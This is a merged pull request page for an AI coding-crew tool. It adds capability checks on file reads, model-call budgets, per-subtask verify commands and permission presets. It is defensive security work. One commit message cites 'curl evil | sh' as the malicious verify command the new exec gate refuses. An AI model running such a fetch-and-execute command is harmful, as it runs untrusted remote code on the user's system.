feat(ocap): enforcement floor steps 3–6 (collapsed) — fs_read, max_calls, team-verify, clamp grammar (#749) #781

Merged
hartsock merged 4 commits into main from feat/ocap-floor-3-6
Jun 29, 2026
@hartsock

Member

OCAP enforcement floor — steps 3–6, collapsed · epic #749

Recovers the stacked enforcement PRs. Step 2 (#751) was squash-merged and its branch auto-deleted, which auto-closed the dependent #759. Steps 3–6 are cherry-picked onto current main as one PR, one commit per step, superseding the orphaned #759/#760/#765/#768 (code identical).

Commits

  • #752 crew.rs — fs_read complete mediation
  • #753 crew.rs — max_calls (+ honest net scoping)
  • #754 team.rs — per-subtask verify exec gate (refuse-not-run)
  • #755 role_profile — optional fs_read clamp on NamedPermissionPreset

Each carries its red-on-today / green-after TDD test. Local just check + just cov-ci green on the collapsed branch.

Fixes #752, #753, #754, #755. Part of #749.

🤖 Generated with Claude Code

hartsock and others added 4 commits June 29, 2026 19:20
…752)

OCAP enforcement-floor stack (#749, PR 3/8; stacked on #751). The crew CURATE stage read
navigator-selected files unconditionally — a clamped fs_read caveat was ignored. Now the
navigator's relevant_files are partitioned through caveats.permits_fs_read(path) (mirroring the
permits_fs_write partition at crew.rs:348): only readable files are read; denied files are never
passed to workspace.read and are surfaced honestly ("N file(s) not readable under your fs_read
caveat: ..."), so a clamped read fails visibly.

TDD: refuses_to_read_outside_the_fs_read_leash — fs_read=Only([file]); the out-of-scope file is
not read, the in-scope one is (red on today's code — both read; green after). just check green
(52 newt-scheduler tests, +1).

Note: permits_fs_read is exact-string membership (no path-prefix/glob); a prefix-aware fs_read
scope is a separate algebra refinement (follow-up). This PR wires the existing predicate.
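
The partition described above can be sketched as follows. This is a minimal illustration, not the code in crew.rs: the `Scope` enum, the `Caveats` struct layout, and the helpers `partition_readable` and `denied_note` are hypothetical stand-ins; only `permits_fs_read`, `relevant_files`, the `Only` scope, and the note wording come from the commit message.

```rust
use std::collections::BTreeSet;

/// Hypothetical stand-in for the fs_read scope type.
#[derive(Debug, Clone)]
pub enum Scope {
    All,
    Only(BTreeSet<String>),
}

/// Hypothetical, reduced to the one axis this sketch needs.
pub struct Caveats {
    pub fs_read: Scope,
}

impl Caveats {
    /// Exact-string membership: no path-prefix or glob matching.
    pub fn permits_fs_read(&self, path: &str) -> bool {
        match &self.fs_read {
            Scope::All => true,
            Scope::Only(allowed) => allowed.contains(path),
        }
    }
}

/// Split the navigator's files into (readable, denied).
/// Only the first list would ever be handed to the workspace reader.
pub fn partition_readable(
    caveats: &Caveats,
    relevant_files: &[String],
) -> (Vec<String>, Vec<String>) {
    relevant_files
        .iter()
        .cloned()
        .partition(|path| caveats.permits_fs_read(path))
}

/// Build the visible note for denied files, or None when nothing was denied.
pub fn denied_note(denied: &[String]) -> Option<String> {
    if denied.is_empty() {
        None
    } else {
        Some(format!(
            "{} file(s) not readable under your fs_read caveat: {}",
            denied.len(),
            denied.join(", ")
        ))
    }
}
```

Because membership is by exact string, a scope of `Only(["src/a.rs"])` in this sketch permits neither `src` nor `./src/a.rs`, which is the limitation the note above defers to a follow-up.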

Fixes #752. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
… budget (#753)

OCAP enforcement-floor stack (#749, PR 4/8; stacked on #759). The crew loop bounded work only by
cfg.max_attempts, ignoring caveats.max_calls. Now a calls_used counter consults
caveats.max_calls.permits_one_more(used) before each model dispatch (navigate/plan/triage); when the
budget denies, the crew stops with an honest NeedsHumanReview cap-exit (never reported as success).
The call unit is the model/role dispatch — matching newt-coder's existing call budget. max_calls is
now an INDEPENDENT ceiling alongside max_attempts; CountBound::Unlimited (the Caveats::top default)
leaves unclamped crews unchanged.
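
As a rough sketch of the gate described above, assuming a simplified loop with three dispatches per attempt: `CountBound`, `permits_one_more`, and `NeedsHumanReview` are named in the commit message, while `Outcome`, `run_crew`, the `dispatch` callback, and the loop shape are hypothetical and much simpler than the real crew loop.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum CountBound {
    Unlimited,
    AtMost(u32),
}

impl CountBound {
    /// True when one more call is allowed after `used` calls.
    pub fn permits_one_more(&self, used: u32) -> bool {
        match self {
            CountBound::Unlimited => true,
            CountBound::AtMost(limit) => used < *limit,
        }
    }
}

/// Hypothetical outcome type; only NeedsHumanReview is named in the source.
#[derive(Debug, PartialEq, Eq)]
pub enum Outcome {
    Success,
    NeedsHumanReview,
}

/// Hypothetical crew loop: max_calls and max_attempts are independent ceilings.
/// Returns the outcome and the number of model dispatches actually made.
pub fn run_crew(
    max_calls: CountBound,
    max_attempts: u32,
    mut dispatch: impl FnMut(&str) -> bool,
) -> (Outcome, u32) {
    let mut calls_used = 0u32;
    for _attempt in 0..max_attempts {
        let mut attempt_ok = true;
        for role in ["navigate", "plan", "triage"] {
            // Consult the budget before every dispatch, including the first.
            if !max_calls.permits_one_more(calls_used) {
                // Cap-exit: never reported as success.
                return (Outcome::NeedsHumanReview, calls_used);
            }
            calls_used += 1;
            attempt_ok &= dispatch(role);
        }
        if attempt_ok {
            return (Outcome::Success, calls_used);
        }
    }
    (Outcome::NeedsHumanReview, calls_used)
}
```

Checking the budget before the increment is what makes `AtMost(0)` deny even the navigator, and `Unlimited` leaves the `max_attempts` bound as the only ceiling.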

net: documented in-code. The crew loop has no direct net effect that a permits_net check could gate;
net is governed transitively via the exec axis (commands) plus an OS sandbox, not by a crew-loop
predicate (per-axis complete mediation: this axis needs a sandbox, not a call-site check).

TDD: max_calls_caveat_bounds_total_model_calls (red on today's code — 21 dispatches with
max_calls=AtMost(3); green after — 3) + max_calls_zero_denies_even_the_navigator (red — 11; green —
0). RED verified by neutralizing the gates. just check green.

Fixes #753. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
…is (#754)

OCAP enforcement-floor stack (#749, PR 5/8; stacked on #760). The lead-authored per-subtask verify
(team.rs run_team) was installed as the test command with NO exec check — a malicious verify
(curl evil | sh) ran ungated (the T2 verify-as-payload vector, design review §3.3). Now
caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run
(not installed; the workspace default check stands; an honest note surfaces it). permits_exec is the
same predicate used for the top-level (crew_runner) + plan-leaf (plan_exec) verifies.
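
The refuse-not-run gate can be illustrated with a small sketch. Everything here except the names `permits_exec` and `set_test_command` is an assumption: the `ExecScope` enum, the `Workspace` struct, the `install_verify` helper, and the note text are hypothetical, and the real `permits_exec` may match commands differently than the exact-string comparison used below.

```rust
/// Hypothetical stand-in for the exec scope.
pub enum ExecScope {
    All,
    Only(Vec<String>),
}

/// Hypothetical, reduced to the exec axis.
pub struct Caveats {
    pub exec: ExecScope,
}

impl Caveats {
    /// Assumption: exact-string match against the allowed commands.
    pub fn permits_exec(&self, command: &str) -> bool {
        match &self.exec {
            ExecScope::All => true,
            ExecScope::Only(allowed) => allowed.iter().any(|c| c == command),
        }
    }
}

/// Hypothetical workspace holding the active test command and surfaced notes.
pub struct Workspace {
    test_command: String,
    pub notes: Vec<String>,
}

impl Workspace {
    pub fn new(default_check: &str) -> Self {
        Workspace {
            test_command: default_check.to_string(),
            notes: Vec::new(),
        }
    }

    pub fn set_test_command(&mut self, command: &str) {
        self.test_command = command.to_string();
    }

    pub fn test_command(&self) -> &str {
        &self.test_command
    }
}

/// Gate a lead-authored verify before installing it.
/// A denied verify is never installed, so it can never run.
pub fn install_verify(caveats: &Caveats, ws: &mut Workspace, verify: &str) -> bool {
    if caveats.permits_exec(verify) {
        ws.set_test_command(verify);
        true
    } else {
        ws.notes.push(format!(
            "verify `{}` refused under your exec caveat; workspace default check stands",
            verify
        ));
        false
    }
}
```

The design point is that the check happens at installation time rather than at run time: once a denied command is never stored as the test command, no later code path can execute it by accident.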

TDD: denied_per_subtask_verify_is_refused_not_installed — exec=Only([check-a]); verify check-b is
NOT installed, check-a is (red on today's code — both installed; green after). RED verified by
revert. just check green (6 team tests).

Fixes #754. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
…ix (#755)

OCAP enforcement-floor stack (#749, PR 6/8; stacked on #765). The M6 grammar gap: a preset could
not narrow fs_read (to_caveat_profile hardcoded ScopeSpec::default()=All), even though
CaveatProfile/Caveats can. NamedPermissionPreset now has an optional fs_read: Option<ScopeSpec>
(serde default None => All, so every existing preset is byte-for-byte unchanged); to_caveat_profile
lowers it (Some narrows reads). A preset CAN now narrow fs_read when specified.
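
A minimal sketch of the lowering, under stated assumptions: the type and method names `NamedPermissionPreset`, `ScopeSpec`, `CaveatProfile`, and `to_caveat_profile` come from the commit message, but the fields shown, the `Only` variant on `ScopeSpec`, and the omission of serde are simplifications made here. The real struct carries more fields and gets its `None` default from serde.

```rust
/// Assumption: ScopeSpec has an `Only` variant; the source confirms only that
/// ScopeSpec::default() is All.
#[derive(Debug, Clone, PartialEq, Eq)]
pub enum ScopeSpec {
    All,
    Only(Vec<String>),
}

impl Default for ScopeSpec {
    fn default() -> Self {
        ScopeSpec::All
    }
}

/// Reduced to the fields this sketch needs; `name` is hypothetical.
#[derive(Debug, Clone, Default)]
pub struct NamedPermissionPreset {
    pub name: String,
    /// None means "not specified", which lowers to All.
    pub fs_read: Option<ScopeSpec>,
}

/// Reduced to the one axis this sketch needs.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct CaveatProfile {
    pub fs_read: ScopeSpec,
}

impl NamedPermissionPreset {
    /// Lower the preset: Some(spec) narrows reads, None keeps the old All.
    pub fn to_caveat_profile(&self) -> CaveatProfile {
        CaveatProfile {
            fs_read: self.fs_read.clone().unwrap_or_default(),
        }
    }
}
```

Making the field an `Option` rather than a bare `ScopeSpec` keeps "unspecified" distinguishable from "explicitly All" at the preset level while still lowering both to the same profile, which is how existing presets stay unchanged.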

Deferred (documented in-code): valid_for_generation (a causal-window axis, not a preset clamp —
follow-up); the default-deny for un-annotated subtasks (an empty clamp is correctly meet-identity;
default-deny belongs in step 8's subtask-clamp derivation, not role_profile's general default —
flipping it would break back-compat for every preset consumer).

TDD: fs_read_clamp_narrows_reads (red on today — fs_read always All; green after) + back-compat
(omitted fs_read => All) + config-parse. RED verified by revert. just check green.

Mechanical: adding the field required `fs_read: None` in 2 exhaustive struct literals (newt-tui test
fixtures); behavior-preserving (consumer literals use ..default()).

Fixes #755. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Labels

ocap Object-capability / authority-security; pending full design review
